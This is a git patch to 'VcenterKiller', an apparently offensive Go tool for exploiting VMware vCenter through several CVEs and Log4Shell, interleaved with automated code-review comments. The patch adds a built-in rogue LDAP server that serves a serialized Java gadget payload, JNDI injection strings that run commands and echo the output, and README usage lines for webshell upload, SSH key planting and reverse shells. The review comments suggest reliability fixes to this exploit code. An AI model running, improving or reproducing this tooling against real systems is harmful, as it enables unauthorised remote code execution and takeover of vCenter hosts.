From c286282b0c88ca30c4e817a04cfe67c33f2a2530 Mon Sep 17 00:00:00 2001 From: root Date: Sat, 15 Oct 2022 17:32:49 +0800 Subject: [PATCH] 1.3.5 --- README.md | 16 +++------- go.mod | 2 ++ go.sum | 4 +++ main.go | 3 ++ src/log4jcenter/log4j.go | 48 ++++++++++++++-------------- src/log4jcenter/server.go | 67 +++++++++++++++++++++++++++++++++++++++ 6 files changed, 105 insertions(+), 35 deletions(-) create mode 100644 src/log4jcenter/server.go diff --git a/README.md b/README.md index be7a2a7..e6676c1 100644 --- a/README.md +++ b/README.md @@ -3,21 +3,13 @@ # VcenterKiller #### 0.必读 -目前本工具处于刚上线阶段,可能会有很多BUG,如果遇到bug请提issue - - - -写这个工具单纯是为了方便,它没有什么高大上的东西 - - - -目前集成了对Vcenter log4j漏洞的检测和利用功能,思路来自于带哥[@j5s](https://github.com/j5s)的项目[SuperFastjsonScan](https://github.com/j5s/SuperFastjsonScan),原理参考[Golang实现RMI协议自动化检测Fastjson](https://www.anquanke.com/post/id/249402),简单来说就是不借助dnslog之类的平台,只要你和目标主机是通的并且你的主机/跳板没有被防火墙做端口限制,那就能直接验证目标是否进行了远程调用。 +如果遇到bug请提issue,写这个工具单纯是为了方便,它没有什么高大上的东西 #### 1.它是什么 -一款针对Vcenter(暂时)的综合**验证**工具,包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005,提供一键上传webshell,命令执行或者上传公钥并使用SSH连接的功能,以及针对Apache Log4j CVE-2021-44228漏洞在Vcenter上的检测以及利用,比如命令执行并获取回显(需要一个ldap恶意服务器)。 +一款针对Vcenter的综合**验证**工具,包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005,提供一键上传webshell,命令执行或者上传公钥并使用SSH连接的功能,以及针对Apache Log4j CVE-2021-44228漏洞在Vcenter上的检测以及利用,比如命令执行并获取回显(~~需要一个ldap恶意服务器~~),现在不需要另外启动ldap服务器了,我根据jndi-injection工具手搓了一个利用方式,Vcenter使用的中间件是Tomcat,直接使用TomcatBypass的利用链就行了。 #### 2.它的定位 
@@ -36,8 +28,7 @@ go build -o main.exe ./main.exe -u https://192.168.1.1 -m 21972 -f id_rsa.pub -t ssh //传公钥 ./main.exe -u https://192.168.1.1 -m 21985 -t rshell -r rmi://xx.xx.xx.xx:1099/xx ./main.exe -u https://192.168.1.1 -m log4center -t scan // scan log4j -./main.exe -u https://192.168.1.1 -m log4center -t rshell -r rmi://xx.xx.xx.xx:1099/xx //get reverseshell and other -./main.exe -u https://192.168.1.1 -m log4center -t exec -r ldap://xx.xx.xx.xx:1389 -c whoami //execute command +./main.exe -u https://192.168.1.1 -m log4center -t exec -r ldap://xx.xx.xx.xx:1389 -c whoami //也可以不指定ldap服务 ./main.exe -u https://xx.xx.com -m 22954 whoami ./main.exe -u https://xx.xx.com -m 22972 //get cookie ./main.exe -u https://xx.xx.com -m 31656 //If CVE-2022-22972不能用就换CVE-2022-31656 @@ -62,6 +53,7 @@ V1.3.1 修复了检测log4j时忽略了端口的问题,有的服务会更改 V1.3.2 修改了针对log4j的利用方式,通过tomcatbypassEcho的方式执行命令并获取回显。vcenter 7.0 linux测试通过。 V1.3.3 增加了对6.7和7.0版本的区别利用,7.0必须使用tomcatbypass,而6.7使用普通的basic就行了 v1.3.4 修改了对log4j的验证逻辑,目前的逻辑是循环5次不同payload无差别乱打,有回显就有,没有就没有 +v1.3.5 消除了log4j对Jndi-Injection-Exploit的依赖,能够直接执行命令并获取回显 ... ``` diff --git a/go.mod b/go.mod index f3365e6..2d3ea6e 100644 --- a/go.mod +++ b/go.mod @@ -13,6 +13,7 @@ require ( github.com/hashicorp/errwrap v1.1.0 // indirect github.com/hashicorp/go-multierror v1.1.1 // indirect github.com/imroc/req/v3 v3.24.0 // indirect + github.com/lor00x/goldap v0.0.0-20180618054307-a546dffdd1a3 // indirect github.com/lucas-clemente/quic-go v0.28.1 // indirect github.com/marten-seemann/qpack v0.2.1 // indirect github.com/marten-seemann/qtls-go1-16 v0.1.5 // indirect 
@@ -23,6 +24,7 @@ require (
 github.com/mattn/go-isatty v0.0.14 // indirect
 github.com/nxadm/tail v1.4.8 // indirect
 github.com/onsi/ginkgo v1.16.5 // indirect
+ github.com/vjeantet/ldapserver v1.0.1 // indirect
 golang.org/x/crypto v0.0.0-20220722155217-630584e8d5aa // indirect
 golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4 // indirect
 golang.org/x/net v0.0.0-20220802222814-0bcc04d9c69b // indirect
diff --git a/go.sum b/go.sum
index 75a48f9..d946ede 100644
--- a/go.sum
+++ b/go.sum
@@ -86,6 +86,8 @@ github.com/kr/pretty v0.1.0/go.mod h1:dAy3ld7l9f0ibDNOQOHHMYYIIbhfbHSm3C4ZsoJORN
 github.com/kr/pty v1.1.1/go.mod h1:pFQYn66WHrOpPYNljwOMqo10TkYh1fy3cYio2l3bCsQ=
 github.com/kr/pty v1.1.3/go.mod h1:pFQYn66WHrOpPYNljwOMqo10TkYh1fy3cYio2l3bCsQ=
 github.com/kr/text v0.1.0/go.mod h1:4Jbv+DJW3UT/LiOwJeYQe1efqtUx/iVham/4vfdArNI=
+github.com/lor00x/goldap v0.0.0-20180618054307-a546dffdd1a3 h1:wIONC+HMNRqmWBjuMxhatuSzHaljStc4gjDeKycxy0A=
+github.com/lor00x/goldap v0.0.0-20180618054307-a546dffdd1a3/go.mod h1:37YR9jabpiIxsb8X9VCIx8qFOjTDIIrIHHODa8C4gz0=
 github.com/lucas-clemente/quic-go v0.28.1 h1:Uo0lvVxWg5la9gflIF9lwa39ONq85Xq2D91YNEIslzU=
 github.com/lucas-clemente/quic-go v0.28.1/go.mod h1:oGz5DKK41cJt5+773+BSO9BXDsREY4HLf7+0odGAPO0=
 github.com/lunixbochs/vtclean v1.0.0/go.mod h1:pHhQNgMf3btfWnGBVipUOjRYhoOsdGqdm/+2c2E2WMI=
@@ -163,6 +165,8 @@ github.com/stretchr/testify v1.5.1/go.mod h1:5W2xD1RspED5o8YsWQXVCued0rvSQ+mT+I5 github.com/tarm/serial v0.0.0-20180830185346-98f6abe2eb07/go.mod h1:kDXzergiv9cbyO7IOYJZWg1U88JhDg3PB6klq9Hg2pA= github.com/viant/assertly v0.4.8/go.mod h1:aGifi++jvCrUaklKEKT0BU95igDNaqkvz+49uaYMPRU= github.com/viant/toolbox v0.24.0/go.mod h1:OxMCG57V0PXuIP2HNQrtJf2CjqdmbrOx5EkMILuUhzM= +github.com/vjeantet/ldapserver v1.0.1 h1:3z+TCXhwwDLJC3pZCNbuECPDqC2x1R7qQQbswB1Qwoc= +github.com/vjeantet/ldapserver v1.0.1/go.mod h1:YvUqhu5vYhmbcLReMLrm/Tq3S7Yj43kSVFvvol6Lh6k= github.com/yuin/goldmark v1.2.1/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74= github.com/yuin/goldmark v1.3.5/go.mod h1:mwnBkeHKe2W/ZEtQ+71ViKU8L12m81fl3OWwC1Zlc8k= github.com/yuin/goldmark v1.4.13/go.mod h1:6yULJ656Px+3vBD8DxQVa3kxgyrAnzto9xy5taEt/CY= diff --git a/main.go b/main.go index c1b1203..8333786 100644 --- a/main.go +++ b/main.go @@ -117,7 +117,10 @@ func main() { usage() os.Exit(0) } else { + + go log4jcenter.Start_server() log4jcenter.Execc(url, rmi, command) + } } else { diff --git a/src/log4jcenter/log4j.go b/src/log4jcenter/log4j.go index df8d17b..f735356 100644 --- a/src/log4jcenter/log4j.go +++ b/src/log4jcenter/log4j.go 
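Review bot: `go log4jcenter.Start_server()` is fire-and-forget: nothing in main stops that goroutine or learns whether the listener actually came up, and judging by server.go in this same patch Start_server parks on a WaitGroup that is never released, so it lives until the process exits. Have Start_server return the error from its ListenAndServe call and surface it from the goroutine here, e.g. `go func() { if err := log4jcenter.Start_server(); err != nil { log the error } }()`, so a failed bind is not silent. The two blank lines added inside the else branch are noise that gofmt will not remove; drop them. main's body starts and ends outside the hunk.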
@@ -130,26 +130,28 @@ func exploit(url, rmiserver string) { } -func exec_cmd(url, rmiserver, command, version string) (bool, string) { - host := rmiserver +func exec_cmd(url, rmiserver, command, cmd, uri string) (bool, string) { + host := "" + if rmiserver == "" { + target := strings.TrimLeft(url, "https://") + host = getIpAddr2(target) + // fmt.Println(host) + } else { + host = rmiserver + } + client := req.C() client.EnableForceHTTP1() // client.DisableAutoReadResponse() // client.SetUnixSocket("1.sock") client.EnableInsecureSkipVerify() client.DisableAutoReadResponse() - client.SetTimeout(4 * time.Second) + client.SetTimeout(2 * time.Second) // client.SetProxyURL("http://127.0.0.1:8080") //尽量别用burp做代理,burp2022.8会启用http2,导致vcenter报错403 rmi_server := "" - cmd := "" - if version == "6" { - rmi_server = fmt.Sprintf("${jndi:%s/Basic/TomcatEcho}", host) - cmd = command + " && echo nmsl" - } else { - rmi_server = fmt.Sprintf("${jndi:%s/TomcatBypass/TomcatEcho}", host) - cmd = command + ";echo 'nmsl'" - } - _ = cmd + cmd = command + cmd + rmi_server = fmt.Sprintf("${jndi:ldap://%s:1389%s}", host, uri) + // fmt.Println(rmi_server) myheader := map[string]string{ "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", 
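Review bot: `strings.TrimLeft(url, "https://")` in the new host-derivation branch treats its second argument as a character set, not a prefix, so any hostname beginning with h, t, p, s, `:` or `/` loses leading characters before it reaches getIpAddr2 (staticcheck SA1024 flags the duplicate-character cutset for exactly this reason); `strings.TrimPrefix(url, "https://")` is the prefix operation that was intended. The port 1389 is hard-coded both in the `rmi_server` format string here and in server.go's ListenAndServe call, so the two can drift; share one constant. The commented-out `// fmt.Println(host)` and `// fmt.Println(rmi_server)` debug lines should not be committed. exec_cmd's body continues past the end of the hunk.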
@@ -203,18 +205,18 @@ func exec_cmd(url, rmiserver, command, version string) (bool, string) { } func Execc(url, rmiserver, command string) { - for i := 0; i < 5; i++ { - temp1, temp2 := exec_cmd(url, rmiserver, command, "7") - if temp1 { - fmt.Println(temp2) - return - } - temp3, temp4 := exec_cmd(url, rmiserver, command, "6") - if temp3 { - fmt.Println(temp4) - return - } + + temp1, temp2 := exec_cmd(url, rmiserver, command, ";echo nmsl", "/TomcatBypass/TomcatEcho") + if temp1 { + fmt.Println(temp2) + return + } + temp3, temp4 := exec_cmd(url, rmiserver, command, " && echo nmsl", "/TomcatBypass/TomcatEcho") + if temp3 { + fmt.Println(temp4) + return } + fmt.Println("[-] 利用失败或不存在漏洞.") } diff --git a/src/log4jcenter/server.go b/src/log4jcenter/server.go new file mode 100644 index 0000000..c6f5e72 --- /dev/null +++ b/src/log4jcenter/server.go 
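Review bot: `temp1, temp2` and `temp3, temp4` say nothing about what the pairs hold, and the two attempts differ only in the echo suffix passed to exec_cmd, so the copy-pasted if-block would read better as a loop: `for _, suffix := range []string{";echo nmsl", " && echo nmsl"} {` with `ok, out := exec_cmd(url, rmiserver, command, suffix, "/TomcatBypass/TomcatEcho")`. Execc also only prints, so a caller cannot tell success from failure without capturing stdout; consider documenting that contract in a doc comment (`// Execc prints the result and reports nothing to the caller.`). The function is complete within the hunk.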
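@@ -0,0 +1,67 @@
+package log4jcenter
+
+import (
+ "encoding/base64"
+ "fmt"
+ "sync"
+ "time"
+
+ "github.com/lor00x/goldap/message"
+ ldap "github.com/vjeantet/ldapserver"
+)
+
+var q sync.WaitGroup
+
+func Start_server() {
+
+ //Create a new LDAP Server
+
+ ldap.Logger = ldap.DiscardingLogger
+ server := ldap.NewServer()
+ routes := ldap.NewRouteMux()
+ routes.Bind(handleBind)
+ routes.Search(handleSearch)
+ server.ReadTimeout = time.Second * 100
+ server.Handle(routes)
+
+ q.Add(1)
+ go server.ListenAndServe(":1389")
+ q.Wait()
+
+}
+
+func handleSearch(w ldap.ResponseWriter, m *ldap.Message) {
+ r := m.GetSearchRequest()
+
+ e := ldap.NewSearchResultEntry("")
+
+ if r.BaseObject() == "TomcatBypass/TomcatEcho" {
+ payload, _ := base64.RawStdEncoding.DecodeString("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")
+ e.AddAttribute("javaClassName", "foo")
+ e.AddAttribute("javaSerializedData", message.AttributeValue(payload))
+ w.Write(e)
+
+ res := ldap.NewSearchResultDoneResponse(ldap.LDAPResultSuccess)
+ w.Write(res)
+ // q.Done()
+ } else {
+ fmt.Println("[-] Ldap request err,exited.")
+ // q.Done()
+ }
+
+}
+
+// handleBind return Success for any login/pass
+func handleBind(w ldap.ResponseWriter, m *ldap.Message) {
+ res := ldap.NewBindResponse(ldap.LDAPResultSuccess)
+ w.Write(res)
+ return
+}
+
+// e.AddAttribute("objectClass", "javaNamingReference")
+// e.AddAttribute("javaCodebase", "http://192.168.159.1:8080/")
+// e.AddAttribute("JavaFactory", "TomcatEchoTemplate")
+// e.AddAttribute("javaClassName", "TomcatEchoTemplate")
+// w.Write(e)
+// res := ldap.NewSearchResultDoneResponse(ldap.LDAPResultSuccess)
+// w.Write(res)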
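Review bot: `q.Add(1)` has no live `q.Done()` (both are commented out in handleSearch), so `q.Wait()` in Start_server blocks forever, and because ListenAndServe runs in its own goroutine its error is discarded — if :1389 is already bound or not permitted, the server silently never starts and the caller cannot tell. The WaitGroup adds nothing; call the listener directly and report the result, `if err := server.ListenAndServe(":1389"); err != nil { fmt.Println("[-] ldap listen:", err) }`, and delete `var q`. `payload, _ := base64.RawStdEncoding.DecodeString(...)` likewise drops a decode error that would otherwise surface only as an empty javaSerializedData attribute; check it and skip the write on failure. Go names are MixedCaps, so `Start_server` should be `StartServer`, and the bare `return` at the end of handleBind is redundant.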